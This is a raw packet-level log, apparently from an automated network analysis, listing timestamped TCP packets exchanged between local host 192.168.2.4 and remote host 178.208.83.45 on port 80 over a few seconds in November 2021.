                          Nov 12, 2021 22:24:15.945117950 CET5011180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.071526051 CET5011180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.072751999 CET5011380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.073921919 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.093892097 CET8050111178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.094014883 CET5011180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.095083952 CET8050113178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.095279932 CET5011380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.095906019 CET5011380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.096234083 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.096438885 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.097812891 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.097940922 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.098207951 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.098383904 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.118386984 CET8050113178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120327950 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120347023 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120559931 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120652914 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120677948 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120698929 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120722055 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120745897 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120800018 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120907068 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120924950 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.120935917 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120973110 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.120973110 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.120981932 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.121059895 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.121109962 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.123121023 CET8050113178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.123245001 CET5011380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.143593073 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143611908 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143620014 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143631935 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143640041 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143651962 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143663883 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143685102 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143724918 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.143754005 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143780947 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.143820047 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.143845081 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143857002 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143883944 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143907070 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.143933058 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143944979 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.143950939 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.143990993 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.143992901 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.144026041 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.144049883 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.144113064 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.144140005 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.144232035 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.144390106 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.144401073 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.144469976 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.166122913 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166146994 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166158915 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166169882 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166182041 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166193008 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166204929 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166215897 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166228056 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166240931 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166251898 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166263103 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166275978 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166286945 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166287899 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.166318893 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166335106 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.166395903 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166407108 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166419029 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166429996 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166444063 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166456938 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166470051 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166481018 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166512012 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166522980 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166554928 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166568041 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166599035 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166610956 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166641951 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166652918 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166676044 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166682959 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166691065 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166714907 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166726112 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166738987 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.166754007 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.188710928 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.188743114 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.188760996 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.188777924 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.188868999 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.188961029 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.188980103 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.188997030 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.189016104 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.189033031 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.189050913 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.189069033 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.191167116 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.192909956 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.238746881 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.239173889 CET5011380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.240879059 CET5011580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.261225939 CET8050114178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.261454105 CET5011480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.261555910 CET8050113178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.261691093 CET5011380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.263315916 CET8050115178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.263437986 CET5011580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.264164925 CET5011580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.286638021 CET8050115178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.290652990 CET8050115178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.291565895 CET5011580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.394551039 CET5011580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.396286011 CET5011680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.416994095 CET8050115178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.418118000 CET5011580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.418608904 CET8050116178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.419101000 CET5011680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.420351982 CET5011680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.443175077 CET8050116178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.446151972 CET8050116178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.448281050 CET5011680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.550489902 CET5011680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.551700115 CET5011780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.572864056 CET8050116178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.573833942 CET5011680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.574305058 CET8050117178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.574459076 CET5011780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.575078011 CET5011780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.597583055 CET8050117178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.726001978 CET8050117178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.727227926 CET5011780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.832427979 CET5011780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.834259987 CET5011880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.855007887 CET8050117178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.855139971 CET5011780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.856487989 CET8050118178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.856692076 CET5011880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.857429028 CET5011880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.879645109 CET8050118178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.880999088 CET8050118178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.881016016 CET8050118178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:16.881185055 CET5011880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.989207983 CET5011880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:16.991100073 CET5011980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.011702061 CET8050118178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.011930943 CET5011880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.013535976 CET8050119178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.014015913 CET5011980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.014741898 CET5011980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.037127972 CET8050119178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.037199020 CET8050119178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.037229061 CET8050119178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.037322998 CET5011980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.037363052 CET5011980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.144808054 CET5011980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.146063089 CET5012080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.167320013 CET8050119178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.167459011 CET5011980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.168488979 CET8050120178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.172923088 CET5012080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.173724890 CET5012080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.196046114 CET8050120178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.200238943 CET8050120178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.200361013 CET5012080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.317092896 CET5012080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.319400072 CET5012180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.341902018 CET8050121178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.342140913 CET5012180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.343234062 CET5012180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.365616083 CET8050121178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.368680954 CET8050121178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.368789911 CET5012180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.378947020 CET8050120178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.420331001 CET8050120178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.420528889 CET5012080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.488235950 CET5012180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.489662886 CET5012280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.510807037 CET8050121178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.510991096 CET5012180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.512307882 CET8050122178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.512486935 CET5012280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.513107061 CET5012280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.535628080 CET8050122178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.538170099 CET8050122178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.538301945 CET5012280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.649807930 CET5012280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.651710987 CET5012380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.674890041 CET8050122178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.674920082 CET8050123178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.674982071 CET5012280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.675113916 CET5012380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.675899029 CET5012380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.698259115 CET8050123178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.701277971 CET8050123178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.701702118 CET5012380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.762028933 CET5012380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.763791084 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.785547972 CET8050123178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.785692930 CET5012380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.786014080 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.786139011 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.786742926 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.787223101 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.787628889 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.787847042 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.810688019 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.810929060 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811502934 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811587095 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811599016 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811610937 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811623096 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811634064 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811633110 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.811645985 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811682940 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.811702967 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.811722040 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.811774015 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811786890 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811800003 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.811850071 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.811887980 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.816914082 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.817058086 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.818449020 CET5012580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.834526062 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.834547997 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.834796906 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.835167885 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.835285902 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.835288048 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.835362911 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.835685968 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.835774899 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.836075068 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.836163998 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.836193085 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.836276054 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.836318970 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.836335897 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.836386919 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.836436033 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.836874962 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.840744019 CET8050125178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.840892076 CET5012580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.841648102 CET5012580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858267069 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858287096 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858299017 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858357906 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858490944 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858525038 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858541965 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858552933 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858557940 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858562946 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858566046 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858568907 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858586073 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858596087 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858617067 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858630896 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858678102 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858684063 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858804941 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858822107 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858836889 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858854055 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858855963 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858869076 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858880997 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858880997 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858890057 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858892918 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858910084 CET8050124178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.858922005 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858944893 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858949900 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.858958960 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.859003067 CET5012480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.863889933 CET8050125178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.867914915 CET8050125178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:17.868181944 CET5012580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.988575935 CET5012580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:17.989850044 CET5012680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.012984991 CET8050126178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.013037920 CET8050125178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.013164043 CET5012680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.013179064 CET5012580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.013941050 CET5012680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.036293030 CET8050126178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.036340952 CET8050126178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.036355019 CET8050126178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.036446095 CET5012680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.144658089 CET5012680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.146477938 CET5012780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.167063951 CET8050126178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.167200089 CET5012680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.168720961 CET8050127178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.168831110 CET5012780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.169370890 CET5012780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.191622972 CET8050127178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.195202112 CET8050127178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.195303917 CET5012780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.301246881 CET5012780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.302731991 CET5012880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.323848009 CET8050127178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.323939085 CET5012780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.325386047 CET8050128178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.325515032 CET5012880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.326132059 CET5012880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.349457026 CET8050128178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.352893114 CET8050128178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.352987051 CET5012880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.457133055 CET5012880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.459402084 CET5012980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.479852915 CET8050128178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.479994059 CET5012880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.481986046 CET8050129178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.482095957 CET5012980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.482834101 CET5012980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.505397081 CET8050129178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.507359028 CET8050129178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.507452965 CET5012980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.613369942 CET5012980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.614526987 CET5013080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.636399031 CET8050129178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.636482954 CET5012980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.636984110 CET8050130178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.637087107 CET5013080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.637799978 CET5013080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.661262989 CET8050130178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.664123058 CET8050130178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:18.664378881 CET5013080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.772016048 CET5013080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:18.773349047 CET5013180192.168.2.4178.208.83.45
